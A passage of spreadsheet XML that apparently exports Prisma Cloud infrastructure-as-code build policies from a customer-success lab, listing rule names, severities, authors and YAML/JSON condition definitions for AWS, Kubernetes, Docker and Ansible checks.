      <c r="AA642" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB642" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC642" t="inlineStr"/>
      <c r="AD642" t="b">
        <v>0</v>
      </c>
      <c r="AE642" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF642" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>dbdfb4d3-3225-4bf2-80a0-54d91fdca542</t>
        </is>
      </c>
      <c r="AI642" t="inlineStr"/>
      <c r="AJ642" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK642" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" t="inlineStr"/>
      <c r="B643" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C643" s="2" t="inlineStr"/>
      <c r="D643" t="inlineStr"/>
      <c r="E643" t="inlineStr"/>
      <c r="F643" t="inlineStr"/>
      <c r="G643" t="b">
        <v>0</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J643" t="inlineStr">
        <is>
          <t>IaC:"general":aws:"aws_s3_bucket"</t>
        </is>
      </c>
      <c r="K643" t="inlineStr">
        <is>
          <t>AppDNATagEvaluationVisualEditor</t>
        </is>
      </c>
      <c r="L643" t="inlineStr"/>
      <c r="M643" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N643" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O643" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P643" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q643" t="inlineStr"/>
      <c r="R643" t="inlineStr"/>
      <c r="S643" t="inlineStr"/>
      <c r="T643" t="b">
        <v>0</v>
      </c>
      <c r="U643" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V643" t="inlineStr">
        <is>
          <t>IaC:"general":aws:"aws_s3_bucket"</t>
        </is>
      </c>
      <c r="W643" t="inlineStr">
        <is>
          <t>AppDNATagEvaluationVisualEditor</t>
        </is>
      </c>
      <c r="X643" t="inlineStr"/>
      <c r="Y643" t="inlineStr"/>
      <c r="Z643" t="inlineStr">
        <is>
          <t>metadata:
  name: "AppDNATagEvaluationVisualEditor"
  severity: "critical"
  guidelines: "AppDNATagEvaluationVisualEditor"
  category: "general"
scope:
  provider: aws
definition:
  cond_type: "attribute"
  resource_types: 
    - "aws_s3_bucket"
    - "aws_db_instance"
    - "aws_instance"
  attribute: "tags.Application"
  operator: "exists"</t>
        </is>
      </c>
      <c r="AA643" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB643" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC643" t="inlineStr"/>
      <c r="AD643" t="b">
        <v>0</v>
      </c>
      <c r="AE643" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF643" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>97e0a7e3-0af2-434e-9e26-20b8fb46c163</t>
        </is>
      </c>
      <c r="AI643" t="inlineStr"/>
      <c r="AJ643" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK643" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" t="inlineStr"/>
      <c r="B644" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C644" s="2" t="inlineStr"/>
      <c r="D644" t="inlineStr"/>
      <c r="E644" t="inlineStr"/>
      <c r="F644" t="inlineStr"/>
      <c r="G644" t="b">
        <v>0</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J644" t="inlineStr">
        <is>
          <t>IaC:"general":aws:azurerm_kubernetes_cluster</t>
        </is>
      </c>
      <c r="K644" t="inlineStr">
        <is>
          <t>build_policy_001: a custom build policy created with terraform</t>
        </is>
      </c>
      <c r="L644" t="inlineStr"/>
      <c r="M644" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N644" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O644" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P644" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q644" t="inlineStr"/>
      <c r="R644" t="inlineStr"/>
      <c r="S644" t="inlineStr">
        <is>
          <t>some_tag</t>
        </is>
      </c>
      <c r="T644" t="b">
        <v>0</v>
      </c>
      <c r="U644" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V644" t="inlineStr">
        <is>
          <t>IaC:"general":aws:azurerm_kubernetes_cluster</t>
        </is>
      </c>
      <c r="W644" t="inlineStr">
        <is>
          <t>fix it after being created from terraform</t>
        </is>
      </c>
      <c r="X644" t="inlineStr">
        <is>
          <t>fix it after being created from terraform</t>
        </is>
      </c>
      <c r="Y644" t="inlineStr"/>
      <c r="Z644" t="inlineStr">
        <is>
          <t>metadata:
  name: "build_policy_001: a custom build policy created with terraform"
  guidelines: "fix it after being created from terraform"
  category: "general"
  severity: "low"
#  id: bp_001
scope:
  provider: aws
definition:
  and:
    - cond_type: attribute
      resource_types: 
      - azurerm_kubernetes_cluster
      attribute: azure_active_directory_role_based_access_control
      operator: exists
    - cond_type: attribute
      resource_types: 
      - azurerm_kubernetes_cluster
      attribute: azure_active_directory_role_based_access_control.azure_rbac_enabled
      operator: is_true</t>
        </is>
      </c>
      <c r="AA644" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB644" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC644" t="inlineStr"/>
      <c r="AD644" t="b">
        <v>0</v>
      </c>
      <c r="AE644" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF644" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>1d5e0976-eb6e-4ee2-826b-0217ee2735c8</t>
        </is>
      </c>
      <c r="AI644" t="inlineStr"/>
      <c r="AJ644" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK644" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" t="inlineStr"/>
      <c r="B645" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C645" s="2" t="inlineStr"/>
      <c r="D645" t="inlineStr"/>
      <c r="E645" t="inlineStr"/>
      <c r="F645" t="inlineStr"/>
      <c r="G645" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J645" t="inlineStr">
        <is>
          <t>IaC:"kubernetes":"aws":"kubernetes_pod"</t>
        </is>
      </c>
      <c r="K645" t="inlineStr">
        <is>
          <t>fail-terraform</t>
        </is>
      </c>
      <c r="L645" t="inlineStr"/>
      <c r="M645" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N645" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O645" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P645" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q645" t="inlineStr"/>
      <c r="R645" t="inlineStr"/>
      <c r="S645" t="inlineStr"/>
      <c r="T645" t="b">
        <v>0</v>
      </c>
      <c r="U645" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V645" t="inlineStr">
        <is>
          <t>IaC:"kubernetes":"aws":"kubernetes_pod"</t>
        </is>
      </c>
      <c r="W645" t="inlineStr"/>
      <c r="X645" t="inlineStr"/>
      <c r="Y645" t="inlineStr"/>
      <c r="Z645" t="inlineStr">
        <is>
          <t>metadata:
  name: "fail-terraform"
  severity: "critical"
  guidelines: "fail-terraform"
  category: "kubernetes"
scope:
  provider: "aws"
definition:
  cond_type: "attribute"
  resource_types:
    - "kubernetes_pod"
  attribute: "metadata.namespace"
  operator: "exists"</t>
        </is>
      </c>
      <c r="AA645" t="inlineStr">
        <is>
          <t>Ruben Gutierrez</t>
        </is>
      </c>
      <c r="AB645" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC645" t="inlineStr"/>
      <c r="AD645" t="b">
        <v>0</v>
      </c>
      <c r="AE645" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF645" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>81e6b562-a133-4348-bb3a-ab3626ce6172</t>
        </is>
      </c>
      <c r="AI645" t="inlineStr"/>
      <c r="AJ645" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK645" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" t="inlineStr"/>
      <c r="B646" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C646" s="2" t="inlineStr"/>
      <c r="D646" t="inlineStr"/>
      <c r="E646" t="inlineStr"/>
      <c r="F646" t="inlineStr"/>
      <c r="G646" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J646" t="inlineStr">
        <is>
          <t>IaC:"kubernetes":"kubernetes":"Deployment"</t>
        </is>
      </c>
      <c r="K646" t="inlineStr">
        <is>
          <t>RG_CHECK: fail</t>
        </is>
      </c>
      <c r="L646" t="inlineStr"/>
      <c r="M646" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N646" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O646" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P646" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q646" t="inlineStr"/>
      <c r="R646" t="inlineStr"/>
      <c r="S646" t="inlineStr"/>
      <c r="T646" t="b">
        <v>0</v>
      </c>
      <c r="U646" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V646" t="inlineStr">
        <is>
          <t>IaC:"kubernetes":"kubernetes":"Deployment"</t>
        </is>
      </c>
      <c r="W646" t="inlineStr"/>
      <c r="X646" t="inlineStr"/>
      <c r="Y646" t="inlineStr"/>
      <c r="Z646" t="inlineStr">
        <is>
          <t>metadata:
#  id: "RG_CHECK"
  name: "RG_CHECK: fail"
  severity: "critical"
  guidelines: "failing example"
  category: "kubernetes"
scope:
  provider: "kubernetes"
definition:
  cond_type: "attribute"
  resource_types:
    - "Deployment"
  attribute: "metadata.namespace"
  operator: "exists"</t>
        </is>
      </c>
      <c r="AA646" t="inlineStr">
        <is>
          <t>Ruben Gutierrez</t>
        </is>
      </c>
      <c r="AB646" t="inlineStr">
        <is>
          <t>2024-11-15 02:15:09</t>
        </is>
      </c>
      <c r="AC646" t="inlineStr"/>
      <c r="AD646" t="b">
        <v>0</v>
      </c>
      <c r="AE646" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF646" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>45534931-752d-464a-99ed-5851ea9218f9</t>
        </is>
      </c>
      <c r="AI646" t="inlineStr"/>
      <c r="AJ646" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK646" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (GKE) - Level 2</t>
        </is>
      </c>
      <c r="B647" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C647" s="2" t="inlineStr"/>
      <c r="D647" t="inlineStr"/>
      <c r="E647" t="inlineStr"/>
      <c r="F647" t="inlineStr"/>
      <c r="G647" t="b">
        <v>0</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J647" t="inlineStr">
        <is>
          <t>IaC:"storage":"aws":"aws_db_instance,</t>
        </is>
      </c>
      <c r="K647" t="inlineStr">
        <is>
          <t>dm-test-Build-example</t>
        </is>
      </c>
      <c r="L647" t="inlineStr"/>
      <c r="M647" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N647" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O647" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P647" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q647" t="inlineStr">
        <is>
          <t>Policies</t>
        </is>
      </c>
      <c r="R647" t="inlineStr">
        <is>
          <t>4.6.3</t>
        </is>
      </c>
      <c r="S647" t="inlineStr">
        <is>
          <t>CIS</t>
        </is>
      </c>
      <c r="T647" t="b">
        <v>0</v>
      </c>
      <c r="U647" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V647" t="inlineStr">
        <is>
          <t>IaC:"storage":"aws":"aws_db_instance,</t>
        </is>
      </c>
      <c r="W647" t="inlineStr"/>
      <c r="X647" t="inlineStr"/>
      <c r="Y647" t="inlineStr"/>
      <c r="Z647" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "dm-test-Build-example"
  severity: "critical"
  guidelines: "Test" #add text that explains the configuration the policy looks for, its implications, and how to fix it
  category: "storage" #choose one: "general"/"iam"/"kubernetes"/"monitoring"/"networking"/"public"/"secrets"/"storage"/"sast"
scope:
  provider: "aws" #provider is required for IaC policies. choose one: "alibaba_cloud"/"aws"/"azure"/"gcp"/"oci"
definition: #define the conditions the policy searches for.
# The example below checks EC2s with instance_type t3.micro or t3.nano. for more examples please visit our docs - https://docs.bridgecrew.io/docs/yaml-format-for-custom-policies
  or:
   - cond_type: "attribute"
     resource_types:
     - "aws_db_instance, aws_rds_cluster"
     attribute: "backup_rerention_period"
     operator: "not_exists"
#     value: "t3.micro"
#   - cond_type: "attribute"
#     resource_types:
#     - "aws_instance"
#     attribute: "instance_type"
#     operator: "equals"
#     value: "t3.nano"
#
# The example below checks for secrets that may leaked into your code
#  cond_type: "secrets"
#  value:
#    - "[A-Za-z0-9]{8,20}"
#    - "my-super-secret-password-regex"</t>
        </is>
      </c>
      <c r="AA647" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB647" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC647" t="inlineStr"/>
      <c r="AD647" t="b">
        <v>0</v>
      </c>
      <c r="AE647" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF647" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>189f6c5d-28e6-4119-94b4-56494b1ebd14</t>
        </is>
      </c>
      <c r="AI647" t="inlineStr"/>
      <c r="AJ647" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK647" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" t="inlineStr"/>
      <c r="B648" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C648" s="2" t="inlineStr"/>
      <c r="D648" t="inlineStr"/>
      <c r="E648" t="inlineStr"/>
      <c r="F648" t="inlineStr"/>
      <c r="G648" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J648" t="inlineStr">
        <is>
          <t>IaC:Compute:</t>
        </is>
      </c>
      <c r="K648" t="inlineStr">
        <is>
          <t>Dockerfile uses a trusted host with pip</t>
        </is>
      </c>
      <c r="L648" t="inlineStr"/>
      <c r="M648" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N648" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O648" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P648" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q648" t="inlineStr"/>
      <c r="R648" t="inlineStr"/>
      <c r="S648" t="inlineStr"/>
      <c r="T648" t="b">
        <v>0</v>
      </c>
      <c r="U648" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V648" t="inlineStr">
        <is>
          <t>IaC:Compute:</t>
        </is>
      </c>
      <c r="W648" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable</t>
        </is>
      </c>
      <c r="X648" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-trusted-host</t>
        </is>
      </c>
      <c r="Y648" t="inlineStr"/>
      <c r="Z648" t="inlineStr">
        <is>
          <t>{"category":"Compute","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA648" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB648" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC648" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_16</t>
        </is>
      </c>
      <c r="AD648" t="b">
        <v>1</v>
      </c>
      <c r="AE648" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF648" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>c8cb26bb-58fc-46e1-a9d5-eea3ac787607</t>
        </is>
      </c>
      <c r="AI648" t="inlineStr"/>
      <c r="AJ648" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK648" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" t="inlineStr"/>
      <c r="B649" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C649" s="2" t="inlineStr"/>
      <c r="D649" t="inlineStr"/>
      <c r="E649" t="inlineStr"/>
      <c r="F649" t="inlineStr"/>
      <c r="G649" t="b">
        <v>1</v>
      </c>
      <c r="H6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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J649" t="inlineStr">
        <is>
          <t>IaC:Compute:AWS::EC2::Instance</t>
        </is>
      </c>
      <c r="K649" t="inlineStr">
        <is>
          <t>Presentation test</t>
        </is>
      </c>
      <c r="L649" t="inlineStr"/>
      <c r="M649" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N649" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O649" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P649" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q649" t="inlineStr"/>
      <c r="R649" t="inlineStr"/>
      <c r="S649" t="inlineStr">
        <is>
          <t>AWS</t>
        </is>
      </c>
      <c r="T649" t="b">
        <v>0</v>
      </c>
      <c r="U649" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V649" t="inlineStr">
        <is>
          <t>IaC:Compute:AWS::EC2::Instance</t>
        </is>
      </c>
      <c r="W649" t="inlineStr">
        <is>
          <t>presentation</t>
        </is>
      </c>
      <c r="X649" t="inlineStr"/>
      <c r="Y649" t="inlineStr"/>
      <c r="Z649" t="inlineStr">
        <is>
          <t>{"category":"Compute","resourceTypes":["AWS::EC2::Instance"],"provider":"aws","framework":["CloudFormation"],"conditionQuery":{"attribute":"InstanceType","operator":"equals","value":"t2.micro","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA649" t="inlineStr">
        <is>
          <t>Ricardo Valdez</t>
        </is>
      </c>
      <c r="AB649" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC649" t="inlineStr"/>
      <c r="AD649" t="b">
        <v>0</v>
      </c>
      <c r="AE649" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF649" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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49" t="inlineStr">
        <is>
          <t>38923d88-23d9-4fa1-a279-9f3c7e449c25</t>
        </is>
      </c>
      <c r="AI649" t="inlineStr"/>
      <c r="AJ649" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK649" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" t="inlineStr"/>
      <c r="B650" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C650" s="2" t="inlineStr"/>
      <c r="D650" t="inlineStr"/>
      <c r="E650" t="inlineStr"/>
      <c r="F650" t="inlineStr"/>
      <c r="G650" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J650" t="inlineStr">
        <is>
          <t>IaC:Compute:ansible.builtin.apt,apt</t>
        </is>
      </c>
      <c r="K650" t="inlineStr">
        <is>
          <t>Usage of the force parameter disabling signature validation allowed</t>
        </is>
      </c>
      <c r="L650" t="inlineStr"/>
      <c r="M650" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N650" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O650" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P650" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q650" t="inlineStr"/>
      <c r="R650" t="inlineStr"/>
      <c r="S650" t="inlineStr"/>
      <c r="T650" t="b">
        <v>0</v>
      </c>
      <c r="U650" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V650" t="inlineStr">
        <is>
          <t>IaC:Compute:ansible.builtin.apt,apt</t>
        </is>
      </c>
      <c r="W650" t="inlineStr">
        <is>
          <t>Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state</t>
        </is>
      </c>
      <c r="X650" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-compute-policies/ansible-6</t>
        </is>
      </c>
      <c r="Y650" t="inlineStr"/>
      <c r="Z650" t="inlineStr">
        <is>
          <t>{"category":"Compute","resourceTypes":["ansible.builtin.apt","apt"]}</t>
        </is>
      </c>
      <c r="AA650" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB650" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC650" t="inlineStr">
        <is>
          <t>CKV_ANSIBLE_6</t>
        </is>
      </c>
      <c r="AD650" t="b">
        <v>1</v>
      </c>
      <c r="AE650" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF650" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>b6fb8d85-58d6-4884-b124-8ad5598d3757</t>
        </is>
      </c>
      <c r="AI650" t="inlineStr"/>
      <c r="AJ650" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK650" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" t="inlineStr"/>
      <c r="B651" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C651" s="2" t="inlineStr"/>
      <c r="D651" t="inlineStr"/>
      <c r="E651" t="inlineStr"/>
      <c r="F651" t="inlineStr"/>
      <c r="G651" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J651" t="inlineStr">
        <is>
          <t>IaC:Compute:ansible.builtin.apt,apt</t>
        </is>
      </c>
      <c r="K651" t="inlineStr">
        <is>
          <t>Usage of packages with unauthenticated or missing signatures allowed</t>
        </is>
      </c>
      <c r="L651" t="inlineStr"/>
      <c r="M651" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N651" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O651" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P651" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q651" t="inlineStr"/>
      <c r="R651" t="inlineStr"/>
      <c r="S651" t="inlineStr"/>
      <c r="T651" t="b">
        <v>0</v>
      </c>
      <c r="U651" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V651" t="inlineStr">
        <is>
          <t>IaC:Compute:ansible.builtin.apt,apt</t>
        </is>
      </c>
      <c r="W651" t="inlineStr">
        <is>
          <t>Ensure that packages with untrusted or missing signatures are not used</t>
        </is>
      </c>
      <c r="X651" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ansible-policies/ansible-compute-policies/ansible-5</t>
        </is>
      </c>
      <c r="Y651" t="inlineStr"/>
      <c r="Z651" t="inlineStr">
        <is>
          <t>{"category":"Compute","resourceTypes":["ansible.builtin.apt","apt"]}</t>
        </is>
      </c>
      <c r="AA651" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB651" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC651" t="inlineStr">
        <is>
          <t>CKV_ANSIBLE_5</t>
        </is>
      </c>
      <c r="AD651" t="b">
        <v>1</v>
      </c>
      <c r="AE651" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF651" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>f876e35e-7b66-42cc-873f-e9cae4b08dd3</t>
        </is>
      </c>
      <c r="AI651" t="inlineStr"/>
      <c r="AJ651" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK651" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" t="inlineStr"/>
      <c r="B652" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C652" s="2" t="inlineStr"/>
      <c r="D652" t="inlineStr"/>
      <c r="E652" t="inlineStr"/>
      <c r="F652" t="inlineStr"/>
      <c r="G652" t="b">
        <v>0</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J652" t="inlineStr">
        <is>
          <t>IaC:Compute:aws-instance</t>
        </is>
      </c>
      <c r="K652" t="inlineStr">
        <is>
          <t>t2.nano</t>
        </is>
      </c>
      <c r="L652" t="inlineStr"/>
      <c r="M652" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N652" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O652" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P652" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q652" t="inlineStr"/>
      <c r="R652" t="inlineStr"/>
      <c r="S652" t="inlineStr"/>
      <c r="T652" t="b">
        <v>0</v>
      </c>
      <c r="U652" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V652" t="inlineStr">
        <is>
          <t>IaC:Compute:aws-instance</t>
        </is>
      </c>
      <c r="W652" t="inlineStr"/>
      <c r="X652" t="inlineStr"/>
      <c r="Y652" t="inlineStr"/>
      <c r="Z652" t="inlineStr">
        <is>
          <t>{"category":"Compute","resourceTypes":["aws_instance"],"conditionQuery":{"attribute":"instance_type","operator":"not_equals","value":"t2.nano","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA652" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB652" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC652" t="inlineStr"/>
      <c r="AD652" t="b">
        <v>0</v>
      </c>
